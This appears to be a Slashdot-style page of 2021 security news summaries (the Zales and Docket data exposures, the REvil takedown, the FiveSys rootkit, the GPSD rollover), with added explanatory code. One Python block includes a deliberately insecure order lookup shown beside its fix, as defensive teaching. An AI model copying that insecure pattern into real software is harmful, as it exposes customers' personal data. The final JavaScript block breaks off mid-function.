Security

Zales.com Leaked Customer Data, Just Like Sister Firms Jared and Kay Jewelers Did In 2018 (krebsonsecurity.com)

An anonymous reader quotes a report from KrebsOnSecurity: In December 2018, bling vendor Signet Jewelers fixed a weakness in their Kay Jewelers and Jared websites that exposed the order information for all of their online customers. This week, Signet subsidiary Zales.com updated its website to remediate a nearly identical customer data exposure. Last week, KrebsOnSecurity heard from a reader who was browsing Zales.com and suddenly found they were looking at someone else's order information on the website, including their name, billing address, shipping address, phone number, email address, items and total amount purchased, delivery date, tracking link, and the last four digits of the customer's credit card number. The reader noticed that the link for the order information she'd stumbled on included a lengthy numeric combination that -- when altered -- would produce yet another customer's order information. When the reader failed to get an immediate response from Signet, KrebsOnSecurity contacted the company.

In a written response, Signet said, "A concern was brought to our attention by an IT professional. We addressed it swiftly, and upon review we found no misuse or negative impact to any systems or customer data." Their statement continues: "As a business principle we make consumer information protection the highest priority, and proactively initiate independent and industry-leading security testing. As a result, we exceed industry benchmarks on data protection maturity. We always appreciate it when consumers reach out to us with feedback, and have committed to further our efforts on data protection maturity."

When Signet fixed similar weaknesses with its Jared and Kay websites back in 2018, the reader who found and reported that data exposure said his mind quickly turned to the various ways crooks might exploit access to customer order information. "My first thought was they could track a package of jewelry to someone's door and swipe it off their doorstep," said Brandon Sheehy, a Dallas-based Web developer. "My second thought was that someone could call Jared's customers and pretend to be Jared, reading the last four digits of the customer's card and saying there'd been a problem with the order, and if they could get a different card for the customer they could run it right away and get the order out quickly. That would be a pretty convincing scam. Or just targeted phishing attacks."

Privacy

A Security Bug in Health App Docket Exposed COVID-19 Vaccine Records (techcrunch.com)

A security bug in the health app Docket exposed the private information of residents vaccinated against COVID-19 in New Jersey and Utah, where the app received endorsements from state officials. From a report: Docket lets residents download and carry a digital copy of their immunizations by pulling their vaccination records from their state's health authority. The digital copy has the same information as the COVID-19 paper card, but is digitally signed by the state to prevent forgeries. Docket is one of several so-called vaccine passports in the U.S., allowing residents to show their vaccination records -- or a scannable QR code -- for getting into events, restaurants or crossing into countries where vaccines are required.

But for a time, the app allowed anyone access to the QR codes of other vaccinated users -- and all the personal and vaccine information encoded within. That included names, dates of birth and information about a person's COVID-19 vaccination status, such as which type of vaccine they received and when. TechCrunch discovered the bug on Tuesday and immediately contacted the company. Docket chief executive Michael Perretta said the bug was fixed at the server level a few hours later. The bug was found in how the Docket app requests the user's QR code from its servers. The user's QR code is generated on the server in the form of a SMART Health Card, a widely accepted standard for validating a person's vaccination status across the world. That QR code is tied to a user ID, which isn't visible from the app, but can be viewed by looking at its network traffic using off-the-shelf software like Burp Suite or Charles Proxy.
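The Zales order page and the Docket QR-code endpoint share one defect: a record is fetched by an identifier the client supplies (a sequential order number in the link, a user ID visible in the app's traffic) with no check that the caller owns it. The following is an added example in Python, not code from Zales, Docket or either report, using constructed sample orders: it shows the vulnerable lookup beside one scoped to the authenticated customer, a per-session denial counter for spotting identifier walking, and an unguessable token for tracking links that are opened without a login.

```python
from __future__ import annotations

import secrets
from collections import Counter
from dataclasses import dataclass, asdict
from typing import Optional


@dataclass(frozen=True)
class Order:
    order_id: int        # sequential and therefore guessable, as in the exposure
    customer_id: int     # the owner; the vulnerable code never consults this
    name: str
    ship_to: str
    card_last4: str      # the kind of field the Zales reader saw for strangers


# Constructed sample data standing in for an order table; not real customers.
ORDERS: dict[int, Order] = {
    100001: Order(100001, 7, "Alice Example", "1 Main St, Dallas, TX", "4242"),
    100002: Order(100002, 8, "Bob Example", "9 Elm Ave, Ogden, UT", "1111"),
}


def view_order_insecure(order_id: int) -> tuple[int, Optional[dict]]:
    """The exposure pattern: the record is fetched by the identifier alone, so a
    customer who edits the number in the link is shown someone else's order.
    Returns an HTTP-style (status, body) pair."""
    order = ORDERS.get(order_id)
    return (200, asdict(order)) if order else (404, None)


# Per-session count of rejected lookups; a burst of these from one session is the
# signature of someone stepping through identifiers.
DENIALS: Counter = Counter()


def view_order(order_id: int, session_customer_id: int) -> tuple[int, Optional[dict]]:
    """Hardened: ownership is part of the lookup. An order that exists but belongs
    to another customer gets the same 404 as a nonexistent one, so the response
    does not confirm which guessed identifiers are real."""
    order = ORDERS.get(order_id)
    if order is None or order.customer_id != session_customer_id:
        DENIALS[session_customer_id] += 1
        return 404, None
    return 200, asdict(order)


def sessions_enumerating(threshold: int = 5) -> list[int]:
    """Sessions whose rejected-lookup count has reached the alerting threshold."""
    return [session for session, n in DENIALS.items() if n >= threshold]


# Tracking links travel by email and are opened without a login, so they must not
# carry the sequential order id at all: hand out an unguessable capability token
# and map it back to the order server-side.
TRACKING_TOKENS: dict[str, int] = {}


def issue_tracking_token(order_id: int) -> str:
    if order_id not in ORDERS:
        raise KeyError(order_id)
    token = secrets.token_urlsafe(32)      # 256 bits of randomness, not enumerable
    TRACKING_TOKENS[token] = order_id
    return token


def view_tracking(token: str) -> tuple[int, Optional[dict]]:
    """Login-free tracking page: resolves the token and exposes only what a
    tracking view needs, never the full order record."""
    order_id = TRACKING_TOKENS.get(token)
    if order_id is None:
        return 404, None
    order = ORDERS[order_id]
    return 200, {"order_id": order.order_id, "ship_to": order.ship_to}


if __name__ == "__main__":
    # Alice (customer 7) alters the number in her link to Bob's order.
    print("insecure:", view_order_insecure(100002)[0])   # 200: Bob's record leaks
    print("hardened:", view_order(100002, 7)[0])         # 404: refused, counted
    token = issue_tracking_token(100001)
    print("tracking:", view_tracking(token)[0], view_tracking("guess")[0])
```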

Security

A Cyberattack Paralyzed Every Gas Station In Iran

Iran's president said Wednesday that a cyberattack which paralyzed every gas station in the Islamic Republic was designed to get "people angry by creating disorder and disruption," as long lines still snaked around the pumps a day after the incident began. NPR reports: Ebrahim Raisi's remarks stopped short of assigning blame for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. However, his remarks suggested that he and others in the theocracy believe anti-Iranian forces carried out the assault. "There should be serious readiness in the field of cyberwar and related bodies should not allow the enemy to follow their ominous aims to make problem in trend of people's life," Raisi said. No group has claimed responsibility for the attack that began Tuesday, though it bore similarities to another months earlier that seemed to directly challenge Iran's Supreme Leader Ayatollah Ali Khamenei as the country's economy buckles under American sanctions.

On Wednesday morning, IRNA quoted another official who claimed 80% of Iran's gas stations had begun selling fuel again. Associated Press journalists saw long lines at multiple gas stations in Tehran. One station had a line of 90 cars waiting for fuel. Those buying ended up having to pay at higher, unsubsidized prices. Tuesday's attack rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump. The semiofficial ISNA news agency, which first called the incident a cyberattack, said it saw those trying to buy fuel with a government-issued card through the machines instead receiving a message reading "cyberattack 64411." While ISNA didn't acknowledge the number's significance, that number is associated with a hotline run through Khamenei's office that handles questions about Islamic law. ISNA later removed its reports, claiming that it too had been hacked. Such claims of hacking can come quickly when Iranian outlets publish news that angers the theocracy.

Security

DeFi Protocol Cream Finance Loses $130 Million in Latest Crypto Hack

DeFi protocol Cream Finance suffered yet another hack this year after an exploit stole at least $130 million in what could be one of the largest thefts in decentralized finance. From a report: The attack on the Ethereum-based lending protocol was first reported by The Block Crypto, which cited a tweet by PeckShield highlighting a large flash-loan transaction that carried out the theft. The burgeoning DeFi landscape has drawn in billions of dollars in investor funds, but it has been a frequent target by hackers, with many using flash loans -- a type of uncollateralized lending -- as a way to exploit poorly protected protocols. Cream was involved in similar attacks that stole nearly $38 million in February and almost $19 million in August, according to The Block. Meanwhile, a hacker stole $600 million worth of crypto tokens from the PolyNetwork protocol in August in what is considered to be the largest DeFi hack ever.

Security

Ransomware Gang Claims Attack on NRA (therecord.media)

The operators of the Grief ransomware have listed today the US National Rifle Association (NRA) as a victim of one of their attacks. From a report: The organization's name was listed on a dark web portal, often called a "leak site," where the Grief gang typically lists companies they infected and which haven't paid their ransom demands. It remains unclear if the Grief gang hit one of the NRA's smaller branches or if the attack hit the organization's central network. Ransomware gangs often like to exaggerate their attacks.

Crime

FBI Raids Chinese Point-of-Sale Giant PAX Technology (krebsonsecurity.com)

An anonymous reader quotes a report from KrebsOnSecurity: U.S. federal investigators today raided the Florida offices of PAX Technology, a Chinese provider of point-of-sale devices used by millions of businesses and retailers globally. KrebsOnSecurity has learned the raid is tied to reports that PAX's systems may have been involved in cyberattacks on U.S. and E.U. organizations. Headquartered in Shenzhen, China, PAX Technology Inc. has more than 60 million point-of-sale terminals in use throughout 120 countries. Earlier today, Jacksonville, Fla.-based WOKV.com reported that agents with the FBI and Department of Homeland Security (DHS) had raided a local PAX Technology warehouse. In an official statement, investigators told WOKV only that they were executing a court-authorized search at the warehouse as a part of a federal investigation, and that the inquiry included the Department of Customs and Border Protection and the Naval Criminal Investigative Services (NCIS).

Several days ago, KrebsOnSecurity heard from a trusted source that the FBI began investigating PAX after a major U.S. payment processor started asking questions about unusual network packets originating from the company's payment terminals. According to that source, the payment processor found that the PAX terminals were being used both as a malware "dropper" -- a repository for malicious files -- and as "command-and-control" locations for staging attacks and collecting information. The source said two major financial providers -- one in the United States and one in the United Kingdom -- had already begun pulling PAX terminals from their payment infrastructure, a claim that was verified by two different sources. The source was unable to share specific details about the strange network activity that prompted the FBI's investigation. But it should be noted that point-of-sale terminals and the technology that supports them are perennial targets of cybercriminals.

Bug

Indie Dev Finds That Linux Users Generate More, Better Bug Reports (pcgamer.com)

An indie developer has made an interesting observation: Though only 5.8% of his game's buyers were playing on Linux, they generated over 38% of the bug reports. Not because the Linux platform was buggier, either. Only 3 of the roughly 400 bug reports submitted by Linux users were platform specific, that is, would only happen on Linux. PC Gamer reports: The developer, posting as Koderski for developer Kodera Software on Reddit, makes indie game [Delta] V: Rings of Saturn -- that's Delta V, or DV, for the non-rocket-science-literate. [...] Koderski says he's sold a little over 12,000 copies of his game, and about 700 of those were bought by Linux players. "I got 1040 bug reports in total, out of which roughly 400 are made by Linux players," says Koderski's post. "That's one report per 11.5 users on average, and one report per 1.75 Linux players. That's right, an average Linux player will get you 650% more bug reports." Koderski's numbers are a limited sample size drawn from one person's experience, but tell a compelling story.

Koderski also says that very few of those bugs were specific to Linux, being clear that "This 5.8% of players found 38% of all the bugs that affected everyone." The bug reports themselves were also pretty high quality, he said, including software and OS versions, logs, and steps for replication. Multiple commenters on the post chalked this up to the kind of people who use Linux: Software professionals, IT employees, and engineers who would already be familiar with official bug reporting processes. It's a strong theory as to why this might be, though the sheer passion that the gaming on Linux community has for anyone who supports their favorite hobby may be another.

Microsoft

Microsoft Says Russia Hacked at Least 14 IT Service Providers this Year (therecord.media)

Microsoft said on Monday that a Russian state-sponsored hacking group known as Nobelium had attacked more than 140 IT and cloud services providers, successfully breaching 14 companies. From a report: The Microsoft Threat Intelligence Center (MSTIC) said the attacks were part of a planned campaign that began in May this year. The attacks included spear-phishing campaigns and password-spraying operations that targeted employees of companies that manage IT and cloud infrastructure on behalf of their clients. "We believe Nobelium ultimately hopes to piggyback on any direct access that resellers may have to their customers' IT systems and more easily impersonate an organization's trusted technology partner to gain access to their downstream customers," said Tom Burt, Corporate Vice President for Customer Security & Trust at Microsoft.

IT

Digital Nomad Communities Want to Build the Infrastructure for an Internet Country (thenextweb.com)

It's estimated there are 10.9 million digital nomads just in the U.S. — and two digital nomads writing for The Next Web point out they're just part of a larger trend. "As of 2021, there are over 35 million digital nomads

Are they also about to start changing the world? Digital nomads' growing numbers and financial clout have caused dozens of tourist-starved countries to update their travel policies for borderless workers. In Summer 2020, a handful of nations launched visa programs to attract digital nomads, starting with Estonia in June, then Barbados, Bermuda, Costa Rica, Anguilla, Antigua, and later, most of Eastern Europe. Now, 30+ nations offer some form of incentive for traveling remote workers. Sweetheart deals like income tax breaks, subsidized housing, and free multiple entry have become as popular as employee work benefits. The opportunities are so numerous, solutions exist just to help you "amenity shop" the perfect country Airbnb style...

Some ambitious nomads, like activist and author Lauren Razavi, have also started to advocate for their rights as global citizens and the future of borderless work... Remote workers like Lauren (and us) want to completely redefine the role governments play in digital nomads' movement and regulation. How? By laying the foundation for the next generation of travel and work, an internet country called Plumia... Plumia wants to build the alternative using decentralized technologies, while also working with countries and institutions on policies that achieve common goals... Begun in 2020 as an independent project by remote-first travel insurance company, SafetyWing, Plumia's plan is to combine the infrastructure for living anywhere with the functions of a geographic country...

Blockchain enthusiasts are also testing an approach that begs the question: are traditional countries still necessary? Bitnation advocates for decentralizing authority by empowering voluntary participation and peer-to-peer agreements. They've hosted the world's first blockchain marriage, birth certificate, refugee emergency ID, and more as proof of concept... Currently in development, Plumia is focusing on developing member-focused services and content... Verifying a digital identity, maintaining a 'permanent address' whilst on the move, switching service providers and jurisdictions on the fly, complying with complicated tax and labor laws — these are all thorny issues to solve. Initiatives like Plumia are jumping into quite an active ring, however.

In addition to countries competing to serve and attract digital nomads, a number of well-financed startups such as Jobbatical, Remote, and Oyster are creating private-sector solutions to issues posed by people and companies going remote.

Microsoft

Traffic-Redirecting Rootkit Somehow Got a Microsoft-issued Digital Signature (zdnet.com)

Cybersecurity researchers at Bitdefender say cyber criminals have been using a rootkit named FiveSys "that somehow made its way through the driver certification process to be digitally signed by Microsoft," reports ZDNet: The valid signature enables the rootkit — malicious software that allows cyber criminals to access and control infected computers — to appear valid, bypass operating system restrictions and gain what researchers describe as "virtually unlimited privileges". It's known for cyber criminals to use stolen digital certificates, but in this case, they've managed to acquire a valid one.

It's still a mystery how cyber criminals were able to get hold of a valid certificate. "Chances is that it was submitted for validation and somehow it got through the checks. While the digital signing requirements detect and stop most of the rootkits, they are not foolproof," Bogdan Botezatu, director of threat research and reporting at Bitdefender, told ZDNet. It's uncertain how FiveSys is actually distributed, but researchers believe that it's bundled with cracked software downloads.

Once installed, FiveSys rootkit redirects internet traffic to a proxy server, which it does by installing a custom root certificate so that the browser won't warn about the unknown identity of the proxy. This also blocks other malware from writing on the drivers, in what's likely an attempt to stop other cyber criminals from taking advantage of the compromised system. Analysis of attacks shows that FiveSys rootkit is being used in cyber attacks targeting online gamers, with the aim of stealing login credentials and the ability to hijack in-game purchases. The popularity of online games means that a lot of money can be involved — not only because banking details are connected to accounts, but also because prestigious virtual items can fetch large sums of money when sold, meaning attackers could exploit access to steal and sell these items.

Currently, the attacks are targeting gamers in China — which is where researchers also believe that the attackers are operating from.

"The campaign started slowly in late 2020, but massively expanded during the course of summer 2021," ZDNet adds.

"The campaign is now blocked after researchers at Bitdefender flagged the abuse of digital trust to Microsoft, which revoked the signature."

Facebook

The Man Who Stole and Then Sold Data on 178 Million Facebook Users Gets Sued by Facebook (therecord.media)

"Facebook has filed a lawsuit on Friday against a Ukrainian national for allegedly scraping its website and selling the personal data of more than 178 million users on an underground cybercrime forum," reports the Record. According to court documents filed Friday, the man was identified as Alexander Alexandrovich Solonchenko, a resident of Kirovograd, Ukraine. Facebook alleges that Solonchenko abused a feature of the Facebook Messenger service called Contact Importer. The feature allowed users to synchronize their phone address books and see which contacts had a Facebook account in order to allow users to reach out to their friends via Facebook Messenger. Between January 2018 and September 2019, Facebook said that Solonchenko used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers. As Facebook servers returned information for which phone numbers had an account on the site, Solonchenko collected the data, which he later offered for sale on December 1, 2020, in a post on RaidForums, a notorious cybercrime forum and marketplace for stolen data.
The article also notes that Facebook's court documents say Solonchenko scraped data from some of the largest companies in the Ukraine, including its largest commercial bank and largest private delivery service.

And the Record points out that he's not the only person known to have used this hole to scrape Facebook's user data and then sell it on the forum. Days after another incident in April involving 533 leaked phone numbers of Facebook users, Facebook "revealed that it retired the Messenger Contact Importer feature back in September 2019 after it discovered Solonchenko and other threat actors abusing it."

Television

Sinclair Workers Say TV Channels Are In 'Pandemonium' After Ransomware Attack (vice.com)

An anonymous reader quotes a report from Motherboard: In the early hours of Sunday morning, hackers took down the corporate servers and systems of Sinclair Broadcast Group, a giant U.S. TV conglomerate that owns or operates more than 600 channels across the country. Days later, inside the company, "it's pandemonium and chaos," as one current employee, who asked to remain anonymous as they were not authorized to speak to the press, told Motherboard. Sinclair has released very few details about the attack since it was hacked Sunday. On Wednesday, Bloomberg reported that the group behind the attack is the infamous Evil Corp., a ransomware gang that is believed to be based in Russia and which was sanctioned by the U.S. Treasury department in 2019.

The ransomware attack interfered with several channels' broadcast programming, preventing them from airing ads or NFL games, as reported by The Record, a news site owned by cybersecurity firm Recorded Future. It has also left employees confused and wondering what's going on, according to current Sinclair workers. "Whoever did this, they either by accident or by design did a very good job," a current employee said in a phone call, explaining that there are some channels that haven't been able to air commercials since Sunday. "We're really running in the blind [...] you really can't do your job." The employee said that he was working on Sunday and was able to get two emails out to colleagues. "And one of them got it, and the other one didn't," they said.

Employees did not have access to their emails until Tuesday morning, according to the two employees and text messages seen by Motherboard. The office computers, however, are still locked by the company out of precaution, and Sinclair told employees not to log into their corporate VPN, which they usually used to do their jobs. Until Thursday, the company was communicating with employees via text, according to the sources, who shared some of the texts sent by the company. In one of them, they called for an all hands meeting. The meeting, according to the two current employees, was quick and vague. Both sources said that the company should be more transparent with its own employees.

Bitcoin

Bitcoin's Price Crashed 87% On Binance.US Thanks To a Bug (vice.com)

An anonymous reader quotes a report from Motherboard: Bitcoin is on a tear, reaching an all-time high price of $67,000 for 1 BTC on Wednesday, buoyed by a series of approvals for Bitcoin futures funds on the stock market. But on one major U.S. exchange, the price flash-crashed 87 percent to roughly $8,200 on Thursday due to a bug in a trading algorithm. The crash occurred during a massive sell-off on the Binance.US exchange that occurred around 7:42 a.m. ET, Bloomberg reported. Binance is the largest cryptocurrency exchange in the world, and its Binance.US exchange is meant to be compliant with U.S. regulations, although it is still banned in several states.

According to a Binance.US spokesperson, the crash was due to an issue with a trading algorithm being run by one "institutional trader," which may indicate an investment fund of some sort. "One of our institutional traders indicated to us that they had a bug in their trading algorithm, which appears to have caused the sell-off," Binance.US told Bloomberg. "We are continuing to look into the event, but understand from the trader that they have now fixed their bug and that the issue appears to have been resolved." It's entirely possible that some lucky traders were at the right place at the right time and managed to snap up some incredibly cheap BTC, but mostly it's yet another example of weirdness along the edges of the crypto ecosystem.

Intel

Intel Open-sources AI-powered Tool To Spot Bugs in Code (venturebeat.com)

Intel has open-sourced ControlFlag, a tool that uses machine learning to detect problems in computer code -- ideally to reduce the time required to debug apps and software. From a report: In tests, the company's machine programming research team says that ControlFlag has found hundreds of defects in proprietary, "production-quality" software, demonstrating its usefulness. "Last year, ControlFlag identified a code anomaly in Client URL (cURL), a computer software project transferring data using various network protocols over one billion times a day," Intel principal AI scientist Justin Gottschlich wrote in a blog post on LinkedIn.

"Most recently, ControlFlag achieved state-of-the-art results by identifying hundreds of latent defects related to memory and potential system crash bugs in proprietary production-level software. In addition, ControlFlag found dozens of novel anomalies on several high-quality open-source software repositories." The demand for quality code draws an ever-growing number of aspiring programmers to the profession. After years of study, they learn to translate abstracts into concrete, executable programs -- but most spend the majority of their working hours not programming. A recent study found that the IT industry spent an estimated $2 trillion in 2020 in software development costs associated with debugging code, with an estimated 50% of IT budgets spent on debugging.

Government

Governments Turn Tables On Ransomware Gang REvil By Pushing It Offline (reuters.com)

An anonymous reader shares a report from Reuters: The ransomware group REvil was itself hacked and forced offline this week by a multi-country operation, according to three private sector cyber experts working with the United States and one former official. Former partners and associates of the Russian-led criminal gang were responsible for a May cyberattack on the Colonial Pipeline that led to widespread gas shortages on the U.S. East Coast. REvil's direct victims include top meatpacker JBS. The crime group's "Happy Blog" website, which had been used to leak victim data and extort companies, is no longer available. Officials said the Colonial attack used encryption software called DarkSide, which was developed by REvil associates.

VMWare head of cybersecurity strategy Tom Kellermann said law enforcement and intelligence personnel stopped the group from victimizing additional companies. "The FBI, in conjunction with Cyber Command, the Secret Service and like-minded countries, have truly engaged in significant disruptive actions against these groups," said Kellermann, an adviser to the U.S. Secret Service on cybercrime investigations. "REvil was top of the list." [...] U.S. government attempts to stop REvil, one of the worst of dozens of ransomware gangs that work with hackers to penetrate and paralyze companies around the world, accelerated after the group compromised U.S. software management company Kaseya in July. That breach opened access to hundreds of Kaseya's customers all at once, leading to numerous emergency cyber incident response calls. Following the attack on Kaseya, the FBI obtained a universal decryption key that allowed those infected via Kaseya to recover their files without paying a ransom. But law enforcement officials initially withheld the key for weeks as it quietly pursued REvil's staff, the FBI later acknowledged. According to three people familiar with the matter, law enforcement and intelligence cyber specialists were able to hack REvil's computer network infrastructure, obtaining control of at least some of their servers.

After websites that the hacker group used to conduct business went offline in July, the main spokesman for the group, who calls himself "Unknown," vanished from the internet. When gang member 0_neday and others restored those websites from a backup last month, he unknowingly restarted some internal systems that were already controlled by law enforcement. "The REvil ransomware gang restored the infrastructure from the backups under the assumption that they had not been compromised," said Oleg Skulkin, deputy head of the forensics lab at the Russian-led security company Group-IB. "Ironically, the gang's own favorite tactic of compromising the backups was turned against them." Reliable backups are one of the most important defenses against ransomware attacks, but they must be kept unconnected from the main networks or they too can be encrypted by extortionists such as REvil.

Bug

GPSD Bug Will Switch Your Time-Keeping Systems To March 2002 This Weekend, Unless You Update (zdnet.com)

"Apparently a bug in GPSD, the daemon responsible for deriving time from the GPS system, is going to trigger on October 24, 2021, jumping the time back to March of 2002," writes Slashdot reader suutar. "There's a fix that's been committed since August, but of course not everything is up to date." ZDNet's Steven J. Vaughan-Nichols writes: This will be ugly. Or, as Stephen Williams, who uncovered the bug put it, "I have a feeling that there will be some 'interesting moments' in the early morning when a bunch of the world's stratum 1 NTP servers using GPSD take the long strange trip back to 2002." GPSD maintainer Gary E. Miller has acknowledged the problem, and a fix has been made to the code. To be exact, the fix is in August 2021's GPSD 3.23 release. So, what's the problem if the fix is already in?

Well, there are two problems. First, it won't be backported to previous releases. If you're still using an older version, you may be out of luck. Second, as Miller observed, not all distros "pick up GPSD updates or upstream their patches. [This] is a very sore spot with me." So, just because your operating system is up to date does not mean that it will have the necessary GPSD fix. Miller suggests that you check it and do it yourself: "I [am] gonna fall back on Greg K_H's dictum: All users must update."

Oh, wondering what the mysterious root cause of all this commotion is? GPS Week Rollover. It's a legacy GPS problem. The GPS signal's week number uses a 10-bit code with a maximum value of 1,023. This means that every 19.7 years, the GPS week number rolls over to zero. Or, as Miller noted, "This code is a 1024 week time warp waiting to happen." So, check your systems now for this problem. And, if, like most of us, you're relying on someone upstream from you for the correct time, check with them to make sure they've taken care of this forthcoming trouble.
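A worked illustration of the 10-bit week ambiguity the article describes, written for this page rather than taken from GPSD (whose actual code and fix are not reproduced here); the "reference date" resolution strategy, the function names and the monitoring check are assumptions of this example. It recomputes why a week number received on 2021-10-24 lands in March 2002 when it is resolved against a reference frozen in 2002, shows the same value resolving correctly against a current reference, and flags a GPS-derived time that sits exactly one 1024-week period behind the system clock, which is what a stratum 1 NTP operator would want to alert on.

```python
from __future__ import annotations

from datetime import date, timedelta
from typing import Union

# GPS week 0 began on Sunday 1980-01-06; the broadcast week field is 10 bits wide.
GPS_EPOCH = date(1980, 1, 6)
WEEK_FIELD_MODULUS = 1024                              # 2**10: wraps to 0 after week 1023
ROLLOVER_PERIOD = timedelta(weeks=WEEK_FIELD_MODULUS)  # the "1024 week time warp"

DateLike = Union[date, str]


def as_date(d: DateLike) -> date:
    """Accept a date or an ISO 8601 string such as '2021-10-24'."""
    return d if isinstance(d, date) else date.fromisoformat(d)


def full_week(d: DateLike) -> int:
    """Continuous GPS week count since the epoch; this value never wraps."""
    return (as_date(d) - GPS_EPOCH).days // 7


def broadcast_week(d: DateLike) -> int:
    """The 10-bit value a satellite actually transmits for the week containing d."""
    return full_week(d) % WEEK_FIELD_MODULUS


def week_to_date(week: int) -> date:
    """The Sunday that begins the given continuous GPS week."""
    return GPS_EPOCH + timedelta(weeks=week)


def resolve_week(week10: int, reference: DateLike) -> int:
    """Recover the continuous week from the 10-bit field.

    The field alone is ambiguous (weeks N, N+1024, N+2048, ... all transmit the same
    value), so a receiver has to assume the true date is not earlier than some
    reference it trusts, typically the software's build or release date. This returns
    the unique continuous week >= week(reference) whose low 10 bits equal week10.
    """
    if not 0 <= week10 < WEEK_FIELD_MODULUS:
        raise ValueError(f"week field out of range: {week10}")
    ref = full_week(reference)
    candidate = ref - (ref % WEEK_FIELD_MODULUS) + week10
    if candidate < ref:            # the match in this 1024-week window is in the past
        candidate += WEEK_FIELD_MODULUS
    return candidate


def decode(week10: int, reference: DateLike) -> date:
    """Date of the week start implied by week10, given the receiver's reference."""
    return week_to_date(resolve_week(week10, reference))


def rollover_regression(decoded: DateLike, wall_clock: DateLike,
                        tolerance_days: int = 7) -> bool:
    """Monitoring check for a time server: True if the GPS-derived date sits about one
    whole 1024-week period behind the machine's own clock, the signature of a
    mishandled week rollover rather than ordinary clock drift."""
    lag = as_date(wall_clock) - as_date(decoded)
    return abs((lag - ROLLOVER_PERIOD).days) <= tolerance_days


if __name__ == "__main__":
    day = date(2021, 10, 24)
    w10 = broadcast_week(day)
    stale = decode(w10, "2002-03-10")   # constructed: a reference frozen in 2002
    fresh = decode(w10, "2021-08-01")   # a reference newer than the 2019 rollover
    print(f"{day}: 10-bit week {w10}; stale reference -> {stale}, "
          f"current reference -> {fresh}")
    print("rollover regression flagged:", rollover_regression(stale, day))
```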

AMD

AMD and Microsoft Issue Fixes For Ryzen CPU Slowdowns On Windows 11 (engadget.com)

AMD and Microsoft have issued patches to address the slowdowns reported with Ryzen processors when Windows 11 launched. Engadget reports: The latest chipset driver (version 3.10.08.506) should take care of the UEFI CPPC2 issue, which in some cases didn't "preferentially schedule threads on a processor's fastest core," AMD said. That could have slowed down apps that are sensitive to CPU thread performance. AMD noted that the problem was likely more noticeable in more powerful processors with more than eight cores and 65W or higher Thermal Design Power (TDP).

Meanwhile, Microsoft is rolling out a software update tackling a bug that increased L3 cache latency. The issue impacted apps that need quick memory access, which in turn caused CPUs to slow down by up to 15 percent. The patch, Windows 11 update KB5006746, will be available starting today, but at the time of writing, a page containing instructions for installing it isn't yet live. You should be able to install it via Windows Update too.

Security

Google Unmasks Two-year-old Phishing and Malware Campaign Targeting YouTube Users (therecord.media)

Almost two years after a wave of complaints flooded Google's support forums about YouTube accounts getting hijacked even if users had two-factor authentication enabled, Google's security team has finally tracked down the root cause of these attacks. From a report: In a report published today, the Google Threat Analysis Group (TAG) attributed these incidents to "a group of hackers recruited in a Russian-speaking forum." TAG said the hackers operated by reaching out to victims via email with various types of business opportunities. YouTubers were typically lured with potential sponsorship deals. Victims were asked to install and test various applications and then publish a review. Apps typically used in these schemes involved antivirus software, VPN clients, music players, photo editors, PC optimizers, or online games.

But unbeknownst to the targets, the hackers hid malware inside the apps. Once the YouTube creators received and installed the demo app, the installer would drop malware on their devices, malware which would extract login credentials and authentication cookies from their browsers and send the stolen data to a remote server. The hackers would then use the authentication cookies to access a YouTuber's account -- bypassing the need to enter a two-factor authentication (2FA) token -- and move to change passwords and the account's recovery email and phone numbers. With the victims locked out of their accounts, the hackers would typically sell the hijacked YouTube channel on underground marketplaces for stolen identities.

United States

Gov. Parson Doubles Down on Push To Prosecute Reporter Who Found Security Flaw in State Site (missouriindependent.com) 185

Gov. Mike Parson escalated his war with the St. Louis Post-Dispatch on Wednesday when his political operation published a video doubling down on his attack against a reporter who informed the state that a state website revealed teacher Social Security numbers. From a report: The video is produced by Uniting Missouri, a political action committee created by Parson supporters to back his 2020 election campaign. The PAC continues to raise and spend large sums of money to promote Parson's political agenda. It operates without direct input from Parson on its activities.

"The St. Louis Post-Dispatch is purely playing politics," the ad states. "Exploiting personal information is a squalid excuse for journalism." The ad comes less than a week after Parson's widely criticized demand for an investigation and prosecution of the reporter who discovered the security flaw in a state website, along with "all those involved." Parson read a statement calling the reporter "a hacker" to reporters gathered outside his Missouri Capitol office last Thursday, then left without taking questions. John Hancock, chairman of Uniting Missouri, declined to discuss any specifics about the video.

Chrome

Google Removes Support for FTP and Old-gen U2F Security Keys in Chrome 95 (therecord.media) 62

Google today released Chrome v95, the latest version of its popular web browser and a version that contains several changes that will likely cause problems for a considerable part of its users. The problematic changes include:

- removing support for File Transfer Protocol (FTP) URLs -- ftp://
- removing support for the Universal 2nd Factor (U2F) standard, used in old-generation security keys (Chrome will only support FIDO2/WebAuthn security keys going forward)
- adding file size limits for browser cookies
- removing support for URLs with non-IPv4 hostnames ending in numbers, such as http://example.0.1
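The last of those changes follows the WHATWG URL "ends in a number" rule: a hostname whose final dotted label looks like a number must parse as a complete IPv4 address, otherwise the URL is rejected. The following is an added example, not Chrome's own code, porting that rule to stand-alone JavaScript; function names and the sample hosts are assumptions.

```javascript
// Added example (not from the article or from Chromium): a stand-alone port
// of the WHATWG URL "ends in a number" check and IPv4 parser, which together
// explain why http://example.0.1 is now rejected while example.com is not.

// Parse one label as the spec's "IPv4 number": decimal, 0x-prefixed hex, or
// leading-zero octal. Returns null when the label is not a number at all.
function parseIPv4Number(label) {
  if (label === "") return null;
  let radix = 10;
  let s = label;
  if (/^0[xX]/.test(s)) { radix = 16; s = s.slice(2); }
  else if (s.length > 1 && s[0] === "0") { radix = 8; s = s.slice(1); }
  if (s === "") return 0; // a bare "0x" is the number zero in the spec
  const digits = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  if (!digits.test(s)) return null;
  return parseInt(s, radix);
}

// "Ends in a number checker": the last non-empty label is all ASCII digits,
// or parses as an IPv4 number (so "example.0x" also counts as numeric).
function endsInNumber(host) {
  const parts = host.split(".");
  if (parts[parts.length - 1] === "") {
    if (parts.length === 1) return false;
    parts.pop(); // ignore one trailing dot
  }
  const last = parts[parts.length - 1];
  if (last !== "" && /^[0-9]+$/.test(last)) return true;
  return parseIPv4Number(last) !== null;
}

// Spec IPv4 parser: at most four numeric labels; the last label may fill the
// remaining octets ("127.1" is 127.0.0.1). Returns a 32-bit number or null.
function parseIPv4(host) {
  const parts = host.split(".");
  if (parts[parts.length - 1] === "" && parts.length > 1) parts.pop();
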